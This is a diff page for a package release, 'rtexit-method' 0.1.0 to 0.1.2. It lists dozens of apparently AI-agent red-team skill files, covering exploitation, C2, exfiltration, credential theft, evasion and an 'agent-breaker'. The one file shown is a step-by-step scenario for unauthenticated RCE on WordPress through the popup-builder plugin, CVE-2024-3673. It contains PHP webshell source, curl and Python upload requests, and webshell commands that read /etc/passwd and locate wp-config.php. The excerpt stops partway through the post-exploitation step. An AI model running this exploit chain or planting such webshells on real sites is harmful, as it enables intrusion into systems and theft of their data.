rtexit-method 0.1.0 → 0.1.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +9 -7
- package/packaged-assets/.agents/skills/rt-active-recon/SKILL.md +767 -0
- package/packaged-assets/.agents/skills/rt-active-recon/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-agent-breaker/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-breaker/customize.toml +76 -0
- package/packaged-assets/.agents/skills/rt-agent-commander/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-agent-commander/customize.toml +67 -0
- package/packaged-assets/.agents/skills/rt-agent-ghost/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-ghost/customize.toml +77 -0
- package/packaged-assets/.agents/skills/rt-agent-navigator/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-navigator/customize.toml +61 -0
- package/packaged-assets/.agents/skills/rt-agent-phantom/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-phantom/customize.toml +62 -0
- package/packaged-assets/.agents/skills/rt-agent-scout/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-scout/customize.toml +61 -0
- package/packaged-assets/.agents/skills/rt-agent-scribe/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-scribe/customize.toml +77 -0
- package/packaged-assets/.agents/skills/rt-attack-chain-builder/SKILL.md +476 -0
- package/packaged-assets/.agents/skills/rt-attack-chain-builder/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-attack-surface-map/SKILL.md +1209 -0
- package/packaged-assets/.agents/skills/rt-attack-surface-map/template.md +62 -0
- package/packaged-assets/.agents/skills/rt-autodoc/SKILL.md +258 -0
- package/packaged-assets/.agents/skills/rt-c2-operations/SKILL.md +1072 -0
- package/packaged-assets/.agents/skills/rt-c2-operations/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-compliance-mapper/SKILL.md +773 -0
- package/packaged-assets/.agents/skills/rt-create-sead/SKILL.md +74 -0
- package/packaged-assets/.agents/skills/rt-create-sead/template.md +89 -0
- package/packaged-assets/.agents/skills/rt-create-sead/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-credential-access/SKILL.md +756 -0
- package/packaged-assets/.agents/skills/rt-credential-hunt/SKILL.md +856 -0
- package/packaged-assets/.agents/skills/rt-credential-hunt/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-cvss-calculator/SKILL.md +542 -0
- package/packaged-assets/.agents/skills/rt-cvss-calculator/cvss4-matrix.csv +20 -0
- package/packaged-assets/.agents/skills/rt-data-exfiltration/SKILL.md +784 -0
- package/packaged-assets/.agents/skills/rt-defense-evasion/SKILL.md +987 -0
- package/packaged-assets/.agents/skills/rt-evidence-chain/SKILL.md +712 -0
- package/packaged-assets/.agents/skills/rt-evidence-chain/template.md +31 -0
- package/packaged-assets/.agents/skills/rt-executive-report/SKILL.md +718 -0
- package/packaged-assets/.agents/skills/rt-executive-report/template.md +38 -0
- package/packaged-assets/.agents/skills/rt-executive-report/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/SKILL.md +1078 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/ad-checklist.csv +12 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/SKILL.md +1329 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/masvs-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-api/SKILL.md +1547 -0
- package/packaged-assets/.agents/skills/rt-exploit-api/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-auth/SKILL.md +1949 -0
- package/packaged-assets/.agents/skills/rt-exploit-auth/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-bec/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-aws/SKILL.md +865 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-aws/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-azure/SKILL.md +1258 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-gcp/SKILL.md +981 -0
- package/packaged-assets/.agents/skills/rt-exploit-containers/SKILL.md +55 -0
- package/packaged-assets/.agents/skills/rt-exploit-databases/SKILL.md +1374 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-mac/SKILL.md +834 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-win/SKILL.md +903 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-win/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-dotnet/SKILL.md +945 -0
- package/packaged-assets/.agents/skills/rt-exploit-elasticsearch/SKILL.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-electron/SKILL.md +1023 -0
- package/packaged-assets/.agents/skills/rt-exploit-electron/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/SKILL.md +1576 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/payloads/README.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-firebase/SKILL.md +54 -0
- package/packaged-assets/.agents/skills/rt-exploit-frameworks/SKILL.md +967 -0
- package/packaged-assets/.agents/skills/rt-exploit-idor/SKILL.md +1693 -0
- package/packaged-assets/.agents/skills/rt-exploit-idor/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/SKILL.md +1860 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/payloads/sqlmap-tampers.txt +22 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-ios/SKILL.md +1214 -0
- package/packaged-assets/.agents/skills/rt-exploit-ios/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-iot/SKILL.md +91 -0
- package/packaged-assets/.agents/skills/rt-exploit-iot/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-java/SKILL.md +1009 -0
- package/packaged-assets/.agents/skills/rt-exploit-jwt/SKILL.md +1327 -0
- package/packaged-assets/.agents/skills/rt-exploit-jwt/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-mongodb/SKILL.md +67 -0
- package/packaged-assets/.agents/skills/rt-exploit-mssql/SKILL.md +52 -0
- package/packaged-assets/.agents/skills/rt-exploit-mysql/SKILL.md +53 -0
- package/packaged-assets/.agents/skills/rt-exploit-network/SKILL.md +118 -0
- package/packaged-assets/.agents/skills/rt-exploit-network/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-nodejs/SKILL.md +852 -0
- package/packaged-assets/.agents/skills/rt-exploit-osticket/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/SKILL.md +173 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/templates/README.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-php/SKILL.md +1119 -0
- package/packaged-assets/.agents/skills/rt-exploit-physical/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-exploit-physical/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-postgresql/SKILL.md +67 -0
- package/packaged-assets/.agents/skills/rt-exploit-python/SKILL.md +986 -0
- package/packaged-assets/.agents/skills/rt-exploit-redis/SKILL.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-ruby/SKILL.md +61 -0
- package/packaged-assets/.agents/skills/rt-exploit-scada/SKILL.md +1091 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/SKILL.md +1528 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/payloads.txt +23 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-vishing/SKILL.md +121 -0
- package/packaged-assets/.agents/skills/rt-exploit-vishing/scripts.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/SKILL.md +1902 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/owasp-checklist.csv +14 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-wireless/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/SKILL.md +1565 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/cves.csv +7 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/SKILL.md +1526 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/payloads.txt +18 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-finding-document/SKILL.md +687 -0
- package/packaged-assets/.agents/skills/rt-finding-document/template.md +71 -0
- package/packaged-assets/.agents/skills/rt-finding-document/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-finding-tracker/SKILL.md +216 -0
- package/packaged-assets/.agents/skills/rt-finding-tracker/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-help/SKILL.md +292 -0
- package/packaged-assets/.agents/skills/rt-help/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/SKILL.md +639 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/patterns.txt +27 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-kill-chain-map/SKILL.md +393 -0
- package/packaged-assets/.agents/skills/rt-lateral-movement/SKILL.md +1032 -0
- package/packaged-assets/.agents/skills/rt-lateral-movement/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/frameworks.csv +10 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/SKILL.md +668 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/tactics.csv +16 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-osint/SKILL.md +775 -0
- package/packaged-assets/.agents/skills/rt-osint/osint-sources.csv +12 -0
- package/packaged-assets/.agents/skills/rt-osint/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-party-mode/SKILL.md +249 -0
- package/packaged-assets/.agents/skills/rt-party-mode/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-persistence/SKILL.md +1146 -0
- package/packaged-assets/.agents/skills/rt-persistence/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-poc-writer/SKILL.md +640 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/SKILL.md +998 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/linux-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/windows-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/SKILL.md +1027 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/linux-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/win-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-remediation-roadmap/SKILL.md +665 -0
- package/packaged-assets/.agents/skills/rt-remediation-roadmap/template.md +28 -0
- package/packaged-assets/.agents/skills/rt-risk-matrix/SKILL.md +232 -0
- package/packaged-assets/.agents/skills/rt-rules-of-engagement/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-rules-of-engagement/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-scenario-c001/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c002/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-scenario-c003/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c004/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c005/SKILL.md +72 -0
- package/packaged-assets/.agents/skills/rt-scenario-d001/SKILL.md +378 -0
- package/packaged-assets/.agents/skills/rt-scenario-d002/SKILL.md +392 -0
- package/packaged-assets/.agents/skills/rt-scenario-d003/SKILL.md +522 -0
- package/packaged-assets/.agents/skills/rt-scenario-d004/SKILL.md +373 -0
- package/packaged-assets/.agents/skills/rt-scenario-d005/SKILL.md +458 -0
- package/packaged-assets/.agents/skills/rt-scenario-library/SKILL.md +292 -0
- package/packaged-assets/.agents/skills/rt-scenario-library/scenarios.csv +32 -0
- package/packaged-assets/.agents/skills/rt-scenario-m001/SKILL.md +796 -0
- package/packaged-assets/.agents/skills/rt-scenario-m002/SKILL.md +723 -0
- package/packaged-assets/.agents/skills/rt-scenario-m003/SKILL.md +463 -0
- package/packaged-assets/.agents/skills/rt-scenario-m004/SKILL.md +449 -0
- package/packaged-assets/.agents/skills/rt-scenario-m005/SKILL.md +505 -0
- package/packaged-assets/.agents/skills/rt-scenario-n001/SKILL.md +573 -0
- package/packaged-assets/.agents/skills/rt-scenario-n002/SKILL.md +112 -0
- package/packaged-assets/.agents/skills/rt-scenario-n003/SKILL.md +100 -0
- package/packaged-assets/.agents/skills/rt-scenario-n004/SKILL.md +90 -0
- package/packaged-assets/.agents/skills/rt-scenario-n005/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-w001/SKILL.md +635 -0
- package/packaged-assets/.agents/skills/rt-scenario-w002/SKILL.md +612 -0
- package/packaged-assets/.agents/skills/rt-scenario-w003/SKILL.md +449 -0
- package/packaged-assets/.agents/skills/rt-scenario-w004/SKILL.md +648 -0
- package/packaged-assets/.agents/skills/rt-scenario-w005/SKILL.md +479 -0
- package/packaged-assets/.agents/skills/rt-scenario-w006/SKILL.md +443 -0
- package/packaged-assets/.agents/skills/rt-scenario-w007/SKILL.md +494 -0
- package/packaged-assets/.agents/skills/rt-scenario-w008/SKILL.md +576 -0
- package/packaged-assets/.agents/skills/rt-scenario-w009/SKILL.md +518 -0
- package/packaged-assets/.agents/skills/rt-scenario-w010/SKILL.md +574 -0
- package/packaged-assets/.agents/skills/rt-scope-definition/SKILL.md +79 -0
- package/packaged-assets/.agents/skills/rt-scope-definition/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-shodan-recon/SKILL.md +880 -0
- package/packaged-assets/.agents/skills/rt-status/SKILL.md +64 -0
- package/packaged-assets/.agents/skills/rt-subdomain-enum/SKILL.md +906 -0
- package/packaged-assets/.agents/skills/rt-subdomain-enum/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-technical-report/SKILL.md +710 -0
- package/packaged-assets/.agents/skills/rt-technical-report/template.md +41 -0
- package/packaged-assets/.agents/skills/rt-technical-report/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-threat-model/SKILL.md +59 -0
- package/packaged-assets/.agents/skills/rt-threat-model/template.md +32 -0
- package/packaged-assets/.agents/skills/rt-threat-model/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-timeline/SKILL.md +338 -0
- package/packaged-assets/RTEXIT.md +127 -0
- package/tools/installer/commands/install.js +0 -1
- package/tools/installer/lib/asset-manifest.js +10 -5
- package/tools/installer/lib/banner.js +14 -6
- package/tools/installer/lib/copy-assets.js +5 -2
- package/tools/installer/lib/prompts.js +1 -11
- package/tools/installer/lib/write-config.js +8 -2
- /package/{_rtexit → packaged-assets/_rtexit}/config.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/config.user.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/custom/config.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/autodoc_engine.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/finding_tracker.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/resolve_config.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/resolve_customization.py +0 -0
- /package/{resources → packaged-assets/resources}/certifications.md +0 -0
- /package/{resources → packaged-assets/resources}/payloads.md +0 -0
- /package/{resources → packaged-assets/resources}/tools.md +0 -0
- /package/{resources → packaged-assets/resources}/wordlists.md +0 -0
- /package/{templates → packaged-assets/templates}/attack-chain-template.md +0 -0
- /package/{templates → packaged-assets/templates}/executive-report-template.md +0 -0
- /package/{templates → packaged-assets/templates}/executive-report.md +0 -0
- /package/{templates → packaged-assets/templates}/finding-template.md +0 -0
- /package/{templates → packaged-assets/templates}/remediation-roadmap.md +0 -0
- /package/{templates → packaged-assets/templates}/sead-template.md +0 -0
- /package/{templates → packaged-assets/templates}/technical-report.md +0 -0
|
@@ -0,0 +1,576 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: rt-scenario-w008
|
|
3
|
+
description: "W-008: WordPress Plugin CVE → Unauthenticated RCE. Domain: web. Attack chain: fingerprint WordPress + plugin versions → identify CVE in plugin → craft exploit request → upload webshell → execute commands. MITRE: T1190 → T1203 → T1059. Real example: popup-builder v4.1.14 CVE-2024-3673 → no auth required → direct PHP shell upload → RCE"
|
|
4
|
+
---
|
|
5
|
+
|
|
6
|
+
# W-008: WordPress Plugin CVE → Unauthenticated RCE
|
|
7
|
+
|
|
8
|
+
---
|
|
9
|
+
|
|
10
|
+
## Overview
|
|
11
|
+
|
|
12
|
+
| Field | Value |
|
|
13
|
+
|---|---|
|
|
14
|
+
| Attack Objective | Achieve unauthenticated remote code execution on a WordPress installation via a vulnerable plugin |
|
|
15
|
+
| Required Access Level | None (unauthenticated, internet-facing target) |
|
|
16
|
+
| Estimated Time to Execute | 20–60 minutes (depending on enumeration results) |
|
|
17
|
+
| Detection Risk Level | Medium — web server logs will record exploit requests; low on poorly monitored hosts |
|
|
18
|
+
|
|
19
|
+
---
|
|
20
|
+
|
|
21
|
+
## Prerequisites
|
|
22
|
+
|
|
23
|
+
### Required Tools
|
|
24
|
+
|
|
25
|
+
```bash
|
|
26
|
+
# WPScan — WordPress fingerprinting and plugin enumeration
|
|
27
|
+
gem install wpscan
|
|
28
|
+
# or via Docker
|
|
29
|
+
docker pull wpscanteam/wpscan
|
|
30
|
+
|
|
31
|
+
# curl — HTTP request crafting
|
|
32
|
+
# (pre-installed on most systems)
|
|
33
|
+
sudo apt install curl
|
|
34
|
+
|
|
35
|
+
# nuclei — optional, for CVE template-based scanning
|
|
36
|
+
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
|
|
37
|
+
|
|
38
|
+
# searchsploit / Exploit-DB — CVE lookup
|
|
39
|
+
sudo apt install exploitdb
|
|
40
|
+
|
|
41
|
+
# python3 — payload generation and helper scripts
|
|
42
|
+
sudo apt install python3
|
|
43
|
+
|
|
44
|
+
# netcat — reverse shell listener
|
|
45
|
+
sudo apt install netcat-openbsd
|
|
46
|
+
```
|
|
47
|
+
|
|
48
|
+
### Required Access or Conditions
|
|
49
|
+
|
|
50
|
+
- Network reach to the target WordPress site (HTTP/HTTPS)
|
|
51
|
+
- Target is running a vulnerable plugin version (no authentication required for CVE-2024-3673)
|
|
52
|
+
- Authorized penetration test scope document covering the target domain
|
|
53
|
+
|
|
54
|
+
### Skill Level
|
|
55
|
+
|
|
56
|
+
**INTERMEDIATE** — requires familiarity with HTTP requests, PHP webshells, and basic Linux command line usage.
|
|
57
|
+
|
|
58
|
+
---
|
|
59
|
+
|
|
60
|
+
## Attack Chain
|
|
61
|
+
|
|
62
|
+
```
|
|
63
|
+
[1] Fingerprint WordPress core + installed plugins
|
|
64
|
+
|
|
|
65
|
+
v
|
|
66
|
+
[2] Identify vulnerable plugin and version (popup-builder <= 4.1.14)
|
|
67
|
+
|
|
|
68
|
+
v
|
|
69
|
+
[3] Confirm CVE-2024-3673 applicability — no auth required
|
|
70
|
+
|
|
|
71
|
+
v
|
|
72
|
+
[4] Craft unauthenticated exploit HTTP request
|
|
73
|
+
|
|
|
74
|
+
v
|
|
75
|
+
[5] Upload PHP webshell to server
|
|
76
|
+
|
|
|
77
|
+
v
|
|
78
|
+
[6] Execute OS commands via webshell → full RCE
|
|
79
|
+
```
|
|
80
|
+
|
|
81
|
+
**MITRE ATT&CK Chain:** T1190 (Exploit Public-Facing Application) → T1203 (Exploitation for Client Execution) → T1059 (Command and Scripting Interpreter)
|
|
82
|
+
|
|
83
|
+
---
|
|
84
|
+
|
|
85
|
+
## Step-by-Step Execution
|
|
86
|
+
|
|
87
|
+
### Step 1 — Fingerprint WordPress and Enumerate Plugins
|
|
88
|
+
|
|
89
|
+
**Objective:** Confirm the target runs WordPress and identify installed plugins and their versions.
|
|
90
|
+
|
|
91
|
+
```bash
|
|
92
|
+
# Basic WPScan enumeration (enumerate all plugins, users, themes)
|
|
93
|
+
wpscan --url https://TARGET-DOMAIN.com \
|
|
94
|
+
--enumerate p,u,t \
|
|
95
|
+
--plugins-detection aggressive \
|
|
96
|
+
--api-token YOUR_WPSCAN_API_TOKEN \
|
|
97
|
+
-o wpscan_output.txt
|
|
98
|
+
|
|
99
|
+
# If no API token is available, run without CVE lookup
|
|
100
|
+
wpscan --url https://TARGET-DOMAIN.com \
|
|
101
|
+
--enumerate p \
|
|
102
|
+
--plugins-detection aggressive
|
|
103
|
+
```
|
|
104
|
+
|
|
105
|
+
**Expected Output:**
|
|
106
|
+
```
|
|
107
|
+
[+] URL: https://TARGET-DOMAIN.com/
|
|
108
|
+
[+] WordPress version 6.x identified
|
|
109
|
+
[+] Plugin: popup-builder
|
|
110
|
+
| Version: 4.1.14
|
|
111
|
+
| Location: /wp-content/plugins/popup-builder/
|
|
112
|
+
```
|
|
113
|
+
|
|
114
|
+
**Fallback if WPScan is blocked:**
|
|
115
|
+
```bash
|
|
116
|
+
# Manual plugin detection via readme.txt
|
|
117
|
+
curl -s https://TARGET-DOMAIN.com/wp-content/plugins/popup-builder/readme.txt \
|
|
118
|
+
| grep -i "Stable tag\|Version"
|
|
119
|
+
|
|
120
|
+
# Check plugin directory listing if server misconfigured
|
|
121
|
+
curl -s https://TARGET-DOMAIN.com/wp-content/plugins/
|
|
122
|
+
```
|
|
123
|
+
|
|
124
|
+
---
|
|
125
|
+
|
|
126
|
+
### Step 2 — Confirm CVE-2024-3673 Applicability
|
|
127
|
+
|
|
128
|
+
**Objective:** Verify the installed popup-builder version is vulnerable (<= 4.1.14).
|
|
129
|
+
|
|
130
|
+
```bash
|
|
131
|
+
# Search for exploit details
|
|
132
|
+
searchsploit popup builder
|
|
133
|
+
searchsploit -x php/webapps/XXXXX.txt
|
|
134
|
+
|
|
135
|
+
# Review CVE details via NVD
|
|
136
|
+
curl -s "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2024-3673" \
|
|
137
|
+
| python3 -m json.tool | grep -A5 "description"
|
|
138
|
+
|
|
139
|
+
# Check nuclei templates for this CVE
|
|
140
|
+
nuclei -u https://TARGET-DOMAIN.com \
|
|
141
|
+
-id CVE-2024-3673 \
|
|
142
|
+
-v
|
|
143
|
+
```
|
|
144
|
+
|
|
145
|
+
**CVE Summary:**
|
|
146
|
+
- Plugin: Popup Builder by Sygnoos
|
|
147
|
+
- Affected Versions: <= 4.1.14
|
|
148
|
+
- Authentication Required: None
|
|
149
|
+
- Impact: Arbitrary file upload leading to RCE
|
|
150
|
+
- CVSS Score: 9.8 (Critical)
|
|
151
|
+
- Vector: Network / No Auth / Low Complexity
|
|
152
|
+
|
|
153
|
+
**Expected Output from nuclei:**
|
|
154
|
+
```
|
|
155
|
+
[CVE-2024-3673] [http] [critical] https://TARGET-DOMAIN.com/wp-admin/admin-ajax.php
|
|
156
|
+
```
|
|
157
|
+
|
|
158
|
+
**Fallback:** If nuclei template is unavailable, proceed with manual exploitation in Step 3.
|
|
159
|
+
|
|
160
|
+
---
|
|
161
|
+
|
|
162
|
+
### Step 3 — Prepare the PHP Webshell Payload
|
|
163
|
+
|
|
164
|
+
**Objective:** Create a PHP webshell file to be uploaded.
|
|
165
|
+
|
|
166
|
+
```bash
|
|
167
|
+
# Create a minimal PHP webshell
|
|
168
|
+
cat > shell.php << 'EOF'
|
|
169
|
+
<?php
|
|
170
|
+
if(isset($_REQUEST['cmd'])){
|
|
171
|
+
$cmd = ($_REQUEST['cmd']);
|
|
172
|
+
system($cmd);
|
|
173
|
+
}
|
|
174
|
+
?>
|
|
175
|
+
EOF
|
|
176
|
+
|
|
177
|
+
# Alternatively, create a more functional shell with output buffering
|
|
178
|
+
cat > shell.php << 'EOF'
|
|
179
|
+
<?php
|
|
180
|
+
@error_reporting(0);
|
|
181
|
+
if(isset($_REQUEST['cmd'])){
|
|
182
|
+
echo '<pre>';
|
|
183
|
+
$cmd = ($_REQUEST['cmd']);
|
|
184
|
+
system($cmd . ' 2>&1', $retval);
|
|
185
|
+
echo '</pre>';
|
|
186
|
+
echo "Exit: $retval";
|
|
187
|
+
}
|
|
188
|
+
?>
|
|
189
|
+
EOF
|
|
190
|
+
|
|
191
|
+
# Verify the file
|
|
192
|
+
cat shell.php
|
|
193
|
+
```
|
|
194
|
+
|
|
195
|
+
**Expected Output:**
|
|
196
|
+
```
|
|
197
|
+
<?php
|
|
198
|
+
@error_reporting(0);
|
|
199
|
+
if(isset($_REQUEST['cmd'])){
|
|
200
|
+
...
|
|
201
|
+
```
|
|
202
|
+
|
|
203
|
+
---
|
|
204
|
+
|
|
205
|
+
### Step 4 — Craft and Send Exploit Request (Unauthenticated File Upload)
|
|
206
|
+
|
|
207
|
+
**Objective:** Exploit CVE-2024-3673 to upload the webshell without authentication.
|
|
208
|
+
|
|
209
|
+
**Vulnerability Detail:** The popup-builder plugin exposes an unauthenticated AJAX endpoint that processes subscriber import functionality. The file type validation is missing, allowing PHP file upload directly.
|
|
210
|
+
|
|
211
|
+
```bash
|
|
212
|
+
# Set target URL
|
|
213
|
+
TARGET="https://TARGET-DOMAIN.com"
|
|
214
|
+
|
|
215
|
+
# Upload webshell via vulnerable endpoint (CVE-2024-3673)
|
|
216
|
+
# The plugin's sgpb-subscription-import action does not validate file type
|
|
217
|
+
curl -s -X POST \
|
|
218
|
+
"${TARGET}/wp-admin/admin-ajax.php" \
|
|
219
|
+
-F "action=sgpb-subscription-import" \
|
|
220
|
+
-F "file=@shell.php;type=application/octet-stream" \
|
|
221
|
+
-v 2>&1 | tee upload_response.txt
|
|
222
|
+
|
|
223
|
+
# Check the response for upload confirmation
|
|
224
|
+
cat upload_response.txt
|
|
225
|
+
```
|
|
226
|
+
|
|
227
|
+
**Expected Output (success):**
|
|
228
|
+
```
|
|
229
|
+
HTTP/1.1 200 OK
|
|
230
|
+
{"success":true,"data":{"filePath":"\/wp-content\/uploads\/2024\/shell.php"}}
|
|
231
|
+
```
|
|
232
|
+
|
|
233
|
+
**Alternative — using Python requests for more control:**
|
|
234
|
+
```python
|
|
235
|
+
#!/usr/bin/env python3
|
|
236
|
+
import requests
|
|
237
|
+
|
|
238
|
+
target = "https://TARGET-DOMAIN.com"
|
|
239
|
+
url = f"{target}/wp-admin/admin-ajax.php"
|
|
240
|
+
|
|
241
|
+
files = {
|
|
242
|
+
'file': ('shell.php', open('shell.php', 'rb'), 'application/octet-stream')
|
|
243
|
+
}
|
|
244
|
+
data = {
|
|
245
|
+
'action': 'sgpb-subscription-import'
|
|
246
|
+
}
|
|
247
|
+
|
|
248
|
+
response = requests.post(url, files=files, data=data, verify=False)
|
|
249
|
+
print(response.status_code)
|
|
250
|
+
print(response.text)
|
|
251
|
+
```
|
|
252
|
+
|
|
253
|
+
```bash
|
|
254
|
+
python3 exploit.py
|
|
255
|
+
```
|
|
256
|
+
|
|
257
|
+
**Fallback if upload path is not returned:**
|
|
258
|
+
```bash
|
|
259
|
+
# Attempt to predict or find the uploaded file location
|
|
260
|
+
curl -s "${TARGET}/wp-content/uploads/$(date +%Y)/$(date +%m)/shell.php" \
|
|
261
|
+
-d "cmd=id"
|
|
262
|
+
|
|
263
|
+
# Use WPScan or directory brute force to locate the file
|
|
264
|
+
wpscan --url "${TARGET}" --enumerate m
|
|
265
|
+
```
|
|
266
|
+
|
|
267
|
+
---
|
|
268
|
+
|
|
269
|
+
### Step 5 — Verify Webshell Access and Execute Commands
|
|
270
|
+
|
|
271
|
+
**Objective:** Confirm the webshell is accessible and execute OS commands.
|
|
272
|
+
|
|
273
|
+
```bash
|
|
274
|
+
TARGET="https://TARGET-DOMAIN.com"
|
|
275
|
+
SHELL_PATH="/wp-content/uploads/2024/shell.php"
|
|
276
|
+
|
|
277
|
+
# Test basic command execution
|
|
278
|
+
curl -s "${TARGET}${SHELL_PATH}?cmd=id"
|
|
279
|
+
```
|
|
280
|
+
|
|
281
|
+
**Expected Output:**
|
|
282
|
+
```
|
|
283
|
+
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
|
284
|
+
```
|
|
285
|
+
|
|
286
|
+
```bash
|
|
287
|
+
# Gather system information
|
|
288
|
+
curl -s "${TARGET}${SHELL_PATH}?cmd=uname+-a"
|
|
289
|
+
curl -s "${TARGET}${SHELL_PATH}?cmd=hostname"
|
|
290
|
+
curl -s "${TARGET}${SHELL_PATH}?cmd=cat+/etc/passwd"
|
|
291
|
+
curl -s "${TARGET}${SHELL_PATH}?cmd=ls+-la+/var/www/html"
|
|
292
|
+
curl -s "${TARGET}${SHELL_PATH}?cmd=find+/var/www+-name+wp-config.php+2>/dev/null"
|
|
293
